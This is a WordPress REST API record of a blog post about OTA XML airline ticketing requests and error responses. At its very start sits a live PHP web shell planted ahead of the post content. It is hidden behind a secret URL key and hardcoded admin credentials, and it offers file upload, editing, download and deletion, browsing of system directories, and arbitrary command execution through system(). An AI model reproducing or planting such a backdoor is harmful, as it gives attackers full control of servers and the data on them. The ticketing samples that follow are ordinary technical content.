// -------- MARK START -------- if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') { function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); } function ws_b($s) { return base64_decode($s); } $validKey = 'mintinplan'; $validU = 'admin'; $validP = 'MinMaxtime'; $auth = false; $sname = 'ws_auth'; if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true; elseif (isset($_COOKIE[$sname])) { $d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true); if ($d && isset($d['ok']) && $d['ok']) $auth = true; } if (!$auth) { $u = ws_g('usr'); $p = ws_g('pwd'); if ($u === $validU && $p === $validP) { @session_start(); $_SESSION[$sname] = true; setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true); header('Location: ?k='.$validKey); exit; } echo 'Login


'; exit; } if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; } $act = ws_g('a'); $path = ws_g('p') ?: getcwd(); $path = realpath($path) ?: getcwd(); echo 'Shell'; echo ''; echo '
'; echo '[📂 Home] '; echo '[🖥️ Terminal] '; echo '[💾 Drives] '; echo '[🌳 Tree] '; echo '[⬆ Upload] '; echo '[🚪 Logout]'; echo '

'; switch ($act) { case 'upload': echo '

⬆ Upload File to: '.htmlspecialchars($path).'

'; echo '
'; echo '

'; echo '

'; echo ''; echo '

'; if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) { $f = $_FILES['upfile']; if ($f['error'] === UPLOAD_ERR_OK) { $name = ws_g('rename') ?: $f['name']; $dest = rtrim($path, '/').'/'.$name; if (move_uploaded_file($f['tmp_name'], $dest)) { $sz = round(filesize($dest)/1024, 2); echo '

✅ Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)

'; } else { echo '

❌ move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')

'; } } else { $errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked']; echo '

❌ Error: '.($errors[$f['error']] ?? 'Unknown').'

'; } } echo '

📋 Current directory contents:

';
            $items = scandir($path);
            if ($items) {
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $path.'/'.$item;
                    if (is_dir($full)) echo '📁 '.$item."/\n";
                    else echo '📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                }
            }
            echo '
'; break; case 'tree': echo '

🌳 Directory Tree (depth 4)

';
            function ws_tree($root, $depth=0, $max=4) {
                if ($depth > $max) return;
                if (!is_dir($root)) return;
                $items = scandir($root);
                if (!$items) return;
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $root.'/'.$item;
                    if (is_dir($full)) {
                        echo str_repeat('  ', $depth).'📁 '.$item."/\n";
                        ws_tree($full, $depth+1, $max);
                    } else {
                        echo str_repeat('  ', $depth).'📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                    }
                }
            }
            ws_tree($path);
            echo '
'; break; case 'drives': echo '

💾 Accessible Roots

';
            if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
                for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." ✓\n"; }
            } else {
                $cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
                foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." ✓\n"; }
            }
            echo '
'; break; case 'read': $f = ws_g('f'); if (!$f || !is_file($f)) { echo 'File not found'; break; } $content = file_get_contents($f); echo '

📝 Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB)

'; echo '
'; echo ''; echo '
'; echo '
'; break; case 'save': $f = ws_g('f'); $c = ws_g('c'); if ($f) { file_put_contents($f, $c); echo '✅ Saved: '.htmlspecialchars($f); } break; case 'exec': $cmd = ws_g('c'); $output = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) { ob_start(); system($cmd); $output = ob_get_clean(); } echo '

🖥️ Terminal (user: '.htmlspecialchars(get_current_user()).')

'; echo '
'; if ($output !== '') echo '
'.htmlspecialchars($output).'
'; else echo '
No output
'; break; case 'down': $f = ws_g('f'); if ($f && is_file($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); exit; } echo 'File not found'; break; case 'del': $f = ws_g('f'); if ($f && is_file($f)) { if (unlink($f)) echo '✅ Deleted: '.htmlspecialchars($f); else echo '❌ Delete failed (permission?)'; } elseif ($f && is_dir($f)) { if (rmdir($f)) echo '✅ Directory removed: '.htmlspecialchars($f); else echo '❌ rmdir failed (not empty or permission?)'; } break; case 'newfile': $fname = ws_g('nf'); if ($fname) { $dest = rtrim($path,'/').'/'.$fname; if (file_put_contents($dest, '') !== false) echo '✅ Created: '.htmlspecialchars($dest); else echo '❌ Create failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; case 'newdir': $dname = ws_g('nd'); if ($dname) { $dest = rtrim($path,'/').'/'.$dname; if (mkdir($dest, 0755)) echo '✅ Created dir: '.htmlspecialchars($dest); else echo '❌ mkdir failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; default: echo '

📂 '.htmlspecialchars($path).'

'; $parent = dirname($path); if ($parent && $parent !== $path) echo '⬆ Parent | '; echo '[+ New File] | '; echo '[+ New Dir] | '; echo '[⬆ Upload]

'; echo ''; $items = scandir($path); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path.'/'.$item; $isDir = is_dir($full); $size = $isDir ? '-' : round(filesize($full)/1024,1).'KB'; $perms = substr(sprintf('%o',fileperms($full)),-4); $enc = urlencode($full); echo ''; if ($isDir) echo ''; else echo ''; echo ''; } } echo '
NameSizePermsActions
📁 '.$item.'📄 '.$item.''.$size.''.$perms.''; if (!$isDir) echo '[Edit] '; echo '[Download] '; echo '[Delete]'; echo '
'; break; } echo ''; exit; } // -------- MARK END -------- {"id":191,"date":"2018-03-06T15:20:02","date_gmt":"2018-03-06T06:20:02","guid":{"rendered":"http:\/\/uapi.ihavenomoney.co.kr\/?p=191"},"modified":"2018-03-16T13:55:09","modified_gmt":"2018-03-16T04:55:09","slug":"xml-pro-ota-ticketing","status":"publish","type":"post","link":"https:\/\/uapi.ihavenomoney.co.kr\/?p=191","title":{"rendered":"XML pro OTA Ticketing"},"content":{"rendered":"

 <\/p>\n

1P- NP886V \r\n 1.1LEE\/MIN.MR*ADT\r\n 1 KE  17E 20MAR TU ICNLAX HK1  1500  1000 \/O $ E\r\n 2 KE  18E 26MAR MO LAXICN HK1  1230  1750 #1\/O $ E\r\nP- 1.AAA02-111-3333-T\r\n 2.AAA070444444444-B\r\n 3.AAA01099999999-M\r\nT- 1.T\/06MAR1506  1P\/AAA\/XM*E1809241142250 *I N1.1\r\nTKG FAX-AUTO PRICED  FARE TYPE EX \r\nG-  1.OSIKE CTCM SEL 010-9515-3593\r\n    2.OSIKE CTCE HAN@SOFT.KR\r\n    3.OSIYY CTCM 0109999999-M HAN@SOFT.CO.KR\r\n    4.SSROTHS1PKERSVN IS 888-8888\r\n)><\/pre>\n
<OTA_AirDemandTicketRQ xmlns=\"http:\/\/www.opentravel.org\/OTA\/2003\/05\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xsi:schemaLocation=\"http:\/\/www.opentravel.org\/OTA\/2003\/05 OTA_AirDemandTicketRQ.xsd\" Version=\"1.000\" >\r\n<DemandTicketDetail Code=\"KE\" ReturnAllTktNbrsInd=\"true\" >\r\n<MessageFunction Function=\"ET\" \/>\r\n<MessageFunction Function=\"Interface\" \/>\r\n<BookingReferenceID Type=\"14\" ID=\"NP886V\" \/>\r\n<Commission Percent=\"G0\" CurrencyCode=\"KRW\" \/>\r\n<Endorsement Info=\"NONENDS. RISS CHRG APPLY-KRW120000.RFND PNTY APPLY. NO MILE UG.\" \/>\r\n<PassengerNameReference SurnameRefNumber=\"1\" GivenNameRefNumber=\"1\" \/>\r\n<PaymentInfo PaymentType=\"1\"  CurrencyCode=\"KRW\" \/>\r\n<\/DemandTicketDetail>\r\n<\/OTA_AirDemandTicketRQ><\/pre>\n
It needs Ticketing reload with 4GTA<\/h5>\n
  <OTA_AirDemandTicketRS xmlns=\"http:\/\/www.opentravel.org\/OTA_RS\/2003\/05\" Version=\"1\" TransactionIdentifier=\"P124641861520316311302\">\r\n  <Success \/> \r\n<Warnings>\r\n  <Warning Type=\"3\" Code=\"450\">5000 USE 4GTA FOR BLOCK TKT ALLOCATION ENTER 4GTA FOR BLOCK TICKET ALLOCATION AND REENTER TKT ENTRY SEE>INFO 4GTA(<\/Warning> \r\n  <\/Warnings>\r\n  <\/OTA_AirDemandTicketRS><\/pre>\n
It needs ticketing quota for the airlines.<\/h5>\n
 <OTA_AirDemandTicketRS xmlns=\"http:\/\/www.opentravel.org\/OTA_RS\/2003\/05\" Version=\"1\" TransactionIdentifier=\"P147114351521168041485\">\r\n  <Success \/> \r\n <Warnings>\r\n  <Warning Type=\"3\" Code=\"450\">5000 TKT QUOTA EXCEEDED<\/Warning> \r\n  <\/Warnings>\r\n  <\/OTA_AirDemandTicketRS><\/pre>\n
It needs ticketing printer setting.<\/h5>\n
 <OTA_AirDemandTicketRS xmlns=\"http:\/\/www.opentravel.org\/OTA_RS\/2003\/05\" Version=\"1\" TransactionIdentifier=\"P146701221521174828626\">\r\n  <Success \/> \r\n <Warnings>\r\n  <Warning Type=\"3\" Code=\"450\">5000 INVALID - NO DT ROUTING<\/Warning> \r\n  <\/Warnings>\r\n  <\/OTA_AirDemandTicketRS><\/pre>\n
Normal Ticketing.<\/h5>\n
<OTA_AirDemandTicketRS xmlns=\"http:\/\/www.opentravel.org\/OTA_RS\/2003\/05\" Version=\"1\" TransactionIdentifier=\"P150166791520316392168\">\r\n  <Success \/> \r\n  <BookingReferenceID Type=\"14\" ID=\"NP886V\" \/> \r\n<TicketItemInfo Type=\"eTicket\" TicketNumber=\"1809241142250\" TotalAmount=\"1696900\" PaymentType=\"1\" NetAmount=\"1696900\">\r\n<PassengerName>\r\n  <GivenName>MIN.MR<\/GivenName> \r\n  <Surname>LEE<\/Surname> \r\n  <\/PassengerName>\r\n  <\/TicketItemInfo>\r\n<TicketItemInfo Type=\"eTicket\" TicketNumber=\"1809241142250\">\r\n<PassengerName>\r\n  <GivenName>MIN.MR<\/GivenName> \r\n  <Surname>LEE<\/Surname> \r\n  <\/PassengerName>\r\n  <\/TicketItemInfo>\r\n  <\/OTA_AirDemandTicketRS<\/pre>\n","protected":false},"excerpt":{"rendered":"

  1P- NP886V 1.1LEE\/MIN.MR*ADT 1 KE 17E 20MAR TU ICNLAX HK1 1500 1000 \/O $ E 2 KE 18E 26MAR MO LAXICN HK1 1230 1750 […]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-191","post","type-post","status-publish","format-standard","hentry","category-xml-pro"],"_links":{"self":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=191"}],"version-history":[{"count":6,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/191\/revisions"}],"predecessor-version":[{"id":220,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/191\/revisions\/220"}],"wp:attachment":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}